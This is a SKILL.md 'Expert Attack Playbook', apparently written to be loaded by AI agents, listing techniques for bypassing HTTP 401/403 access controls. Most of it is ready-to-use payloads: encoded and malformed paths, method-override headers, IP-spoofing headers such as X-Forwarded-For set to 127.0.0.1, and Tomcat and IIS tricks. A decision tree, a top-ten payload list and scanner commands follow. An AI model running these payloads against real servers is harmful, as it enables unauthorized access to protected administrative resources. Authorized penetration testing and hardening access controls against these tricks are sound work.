SKILL: 401/403 Bypass Techniques — Expert Attack Playbook

AI LOAD INSTRUCTION: Comprehensive 401/403 forbidden bypass techniques. Covers path normalization tricks, HTTP method override, header-based bypasses (X-Original-URL, X-Forwarded-For), protocol version tricks, and combination attacks. Base models typically know 2-3 header bypasses but miss the full matrix of path manipulation variants and verb+path combos.

0. RELATED ROUTING

authbypass-authentication-flaws — broader auth bypass (login flaws, session handling)
waf-bypass-techniques — when bypass is WAF-specific rather than access control
http-host-header-attacks — Host header manipulation for routing bypass
request-smuggling — smuggle past access controls entirely
http2-specific-attacks — h2c smuggling to bypass proxy ACLs

1. PATH MANIPULATION BYPASSES

The core idea: the reverse proxy/WAF checks one path format, but the backend normalizes differently.

1.1 Trailing Slash / Missing Slash

/admin      → 403
/admin/     → 200  ✓ (trailing slash)
/admin/.    → 200  ✓ (trailing dot)

1.2 Case Sensitivity

/admin      → 403
/Admin      → 200  ✓
/ADMIN      → 200  ✓
/aDmIn      → 200  ✓

Works when: proxy rule is case-sensitive but backend is case-insensitive (common on Windows/IIS).

1.3 URL Encoding

/admin          → 403
/%61dmin        → 200  ✓ (encode 'a')
/admi%6e        → 200  ✓ (encode 'n')
/%61%64%6d%69%6e → 200  ✓ (full encode)

1.4 Double URL Encoding

/admin              → 403
/%2561dmin          → 200  ✓ (%25 = %, decoded twice: %61 → a)
/admin%252f         → 200  ✓
/admin..%252f       → 200  ✓

1.5 Unicode / UTF-8 Encoding

/admin          → 403
/admi%C0%AE     → 200  ✓ (overlong UTF-8 for '.')
/admi%C0%6E     → 200  ✓ (overlong encoding)
/%C0%AFadmin    → 200  ✓ (overlong '/')

1.6 Dot-Segment / Path Traversal

/admin          → 403
/./admin        → 200  ✓
//admin         → 200  ✓
/admin/./       → 200  ✓
/.//admin       → 200  ✓
/admin..;/      → 200  ✓ (Tomcat path parameter)

1.7 Null Byte

/admin          → 403
/admin%00       → 200  ✓
/admin%00.json  → 200  ✓
/%00/admin      → 200  ✓

1.8 Path Parameter Injection

/admin          → 403
/admin;foo=bar  → 200  ✓ (Tomcat/Java treats ; as path param)
/admin;         → 200  ✓
/admin;x        → 200  ✓

1.9 Trailing Special Characters

/admin%20 (space)  /admin%09 (tab)   /admin? (empty query)
/admin.json        /admin.html       /admin/~

1.10 Backslash (Windows/IIS)

/admin\    /admin\..\/    \..\admin

1.11 Combined Path Tricks

///admin///    /./admin/./    /admin/..;/admin (Tomcat)    /%2e/admin

2. HTTP METHOD BYPASS

2.1 Direct Method Change

GET  /admin → 403
POST /admin → 200  ✓
PUT  /admin → 200  ✓
PATCH /admin → 200  ✓
DELETE /admin → 200  ✓
OPTIONS /admin → 200  ✓ (may leak allowed methods)
TRACE /admin → 200  ✓ (may reflect headers — XST)
HEAD /admin → 200  ✓ (same as GET but no body — confirms access)

2.2 Method Override Headers

When the proxy blocks by method, but the backend reads override headers:

http

GET /admin HTTP/1.1
X-HTTP-Method-Override: PUT

GET /admin HTTP/1.1
X-Method-Override: POST

GET /admin HTTP/1.1
X-HTTP-Method: DELETE

POST /admin HTTP/1.1
X-HTTP-Method-Override: PATCH
_method=PUT  (in POST body — Rails, Laravel)

2.3 Custom / Invalid Methods

FOOBAR /admin HTTP/1.1     → some ACLs only check GET/POST
GETS /admin HTTP/1.1       → typo-like methods may bypass
CONNECT /admin HTTP/1.1    → proxy may tunnel
PROPFIND /admin HTTP/1.1   → WebDAV method
MOVE /admin HTTP/1.1       → WebDAV method

3. HEADER-BASED BYPASS

3.1 URL Rewrite Headers (Nginx/IIS)

These headers tell the backend the "real" URL, bypassing proxy-level path checks:

http

GET / HTTP/1.1
X-Original-URL: /admin

GET / HTTP/1.1
X-Rewrite-URL: /admin

The proxy sees

GET /

(allowed), but the backend routes to

/admin

3.2 IP Spoofing Headers (Whitelist Bypass)

Headers to try (each with values

127.0.0.1

10.0.0.1

0.0.0.0

::1

http

X-Forwarded-For | X-Real-IP | X-Originating-IP | X-Remote-IP
X-Remote-Addr | X-Client-IP | True-Client-IP | Cluster-Client-IP
X-ProxyUser-IP | X-Custom-IP-Authorization | Forwarded: for=127.0.0.1

IP encoding variants:

0177.0.0.1

(octal),

2130706433

(decimal),

0x7f000001

(hex),

localhost

3.3 Other Header Tricks

http

Referer: https://target.com/admin     # Referrer check bypass
Origin: https://target.com             # Origin check bypass
Host: localhost                         # Host header manipulation
X-Forwarded-Host: localhost            # Forwarded host
Content-Type: application/json         # Content-type switch
X-Requested-With: XMLHttpRequest       # AJAX flag

4. PROTOCOL VERSION BYPASS

http

# HTTP/1.0 (some ACLs only apply to HTTP/1.1)
GET /admin HTTP/1.0

# HTTP/0.9 (extremely legacy — no headers)
GET /admin

# HTTP/2 pseudo-header tricks
:method: GET
:path: /admin
:authority: target.com
# See ../http2-specific-attacks/SKILL.md for H2-specific bypasses

5. VERB TAMPERING + PATH COMBINATION

Combine multiple techniques for higher success rate:

http

POST / HTTP/1.1                          # method override + URL rewrite
X-Original-URL: /admin
X-HTTP-Method-Override: GET

GET /%61dmin HTTP/1.1                    # IP spoof + path encoding
X-Forwarded-For: 127.0.0.1

GET /Admin HTTP/1.0                      # protocol + case + IP spoof
X-Forwarded-For: 127.0.0.1

6. TECHNOLOGY-SPECIFIC BYPASSES

Server	Key Tricks
Apache	`/admin/` (trailing slash), `/.admin` (dot prefix), `/admin%0d` (CR)
Nginx	`/Admin` (case), `/admin../` (normalization), `X-Original-URL: /admin`
IIS/ASP.NET	`/admin;.css` (path param+ext), `/admin\` (backslash), `/admin::$DATA` (ADS), `/admin%20`
Tomcat/Java	`/admin;foo` (path param), `/admin..;/` (traversal), `/;/admin` (empty param)
Spring	`/admin.anything` (suffix matching, older), `/admin/` (trailing slash)

7. AUTOMATED TOOLS

Tool	Purpose	URL
byp4xx	Comprehensive 403 bypass scanner	github.com/lobuhi/byp4xx
403bypasser	Automated header/path/method bypass	github.com/sting8k/403bypasser
dirsearch	Directory brute-force with encoding variants	github.com/maurosoria/dirsearch
feroxbuster	Recursive content discovery	github.com/epi052/feroxbuster
Burp Intruder	Custom payload lists for manual testing	portswigger.net

byp4xx usage

bash

# Basic usage
./byp4xx.sh https://target.com/admin

# Output shows all attempted bypasses and their response codes
# 200/301/302 responses = potential bypass found

8. DECISION TREE

Got 401 or 403 on a path?
│
├── Try PATH MANIPULATION first (highest success rate)
│   ├── /path/      (trailing slash)
│   ├── /PATH       (case change)
│   ├── /path%20    (trailing space)
│   ├── /./path     (dot segment)
│   ├── //path      (double slash)
│   ├── /path;x     (path parameter — Java/Tomcat)
│   ├── /path..;/   (Tomcat specific)
│   ├── /%2e/path   (encoded dot)
│   ├── /path%00    (null byte)
│   ├── /path%23    (encoded hash)
│   └── Result? → 200 = bypass found
│
├── Path tricks failed → Try METHOD BYPASS
│   ├── POST/PUT/PATCH/DELETE/OPTIONS
│   ├── HEAD (same as GET without body)
│   ├── X-HTTP-Method-Override: PUT
│   └── TRACE (may reflect auth headers — XST)
│
├── Method tricks failed → Try HEADER BYPASS
│   ├── X-Original-URL: /path      (Nginx/IIS rewrite)
│   ├── X-Rewrite-URL: /path       (same concept)
│   ├── X-Forwarded-For: 127.0.0.1 (IP whitelist)
│   ├── X-Real-IP: 127.0.0.1
│   ├── True-Client-IP: 127.0.0.1
│   └── Referer: https://target.com/path
│
├── Header tricks failed → Try PROTOCOL BYPASS
│   ├── HTTP/1.0 instead of 1.1
│   ├── HTTP/2 h2c smuggling (../http2-specific-attacks/)
│   └── WebSocket upgrade
│
├── Single techniques failed → Try COMBINATIONS
│   ├── Method + Path: POST /PATH/
│   ├── Header + Path: X-Forwarded-For + /path%20
│   ├── All three: POST + X-Original-URL + IP headers
│   └── Protocol + Path: HTTP/1.0 + encoded path
│
├── All bypasses failed → Consider ALTERNATIVE APPROACHES
│   ├── Request smuggling (../request-smuggling/) → smuggle past ACL
│   ├── SSRF (../ssrf-server-side-request-forgery/) → access from server
│   ├── IDOR (../idor-broken-object-authorization/) → access data directly
│   └── Auth flaws (../authbypass-authentication-flaws/) → login bypass
│
└── Automated scan with byp4xx / 403bypasser for completeness

9. QUICK REFERENCE — KEY PAYLOADS

http

# Top 10 quick-wins (try these first)
GET /admin/     HTTP/1.1        # trailing slash
GET /Admin      HTTP/1.1        # case change
GET /admin%20   HTTP/1.1        # trailing space
GET /./admin    HTTP/1.1        # dot segment
GET //admin     HTTP/1.1        # double slash
POST /admin     HTTP/1.1        # method change
GET / HTTP/1.1                  # X-Original-URL bypass
X-Original-URL: /admin
GET /admin HTTP/1.1             # IP whitelist bypass
X-Forwarded-For: 127.0.0.1
GET /admin;.css HTTP/1.1        # IIS path param
GET /admin..;/ HTTP/1.1         # Tomcat bypass

401-403-bypass-techniques

NPX Install

Tags

SKILL.md Content

SKILL: 401/403 Bypass Techniques — Expert Attack Playbook

0. RELATED ROUTING

1. PATH MANIPULATION BYPASSES

1.1 Trailing Slash / Missing Slash

1.2 Case Sensitivity

1.3 URL Encoding

1.4 Double URL Encoding

1.5 Unicode / UTF-8 Encoding

1.6 Dot-Segment / Path Traversal

1.7 Null Byte

1.8 Path Parameter Injection

1.9 Trailing Special Characters

1.10 Backslash (Windows/IIS)

1.11 Combined Path Tricks

2. HTTP METHOD BYPASS

2.1 Direct Method Change

2.2 Method Override Headers

2.3 Custom / Invalid Methods

3. HEADER-BASED BYPASS

3.1 URL Rewrite Headers (Nginx/IIS)

3.2 IP Spoofing Headers (Whitelist Bypass)

3.3 Other Header Tricks

4. PROTOCOL VERSION BYPASS

5. VERB TAMPERING + PATH COMBINATION

6. TECHNOLOGY-SPECIFIC BYPASSES

7. AUTOMATED TOOLS

byp4xx usage

8. DECISION TREE

9. QUICK REFERENCE — KEY PAYLOADS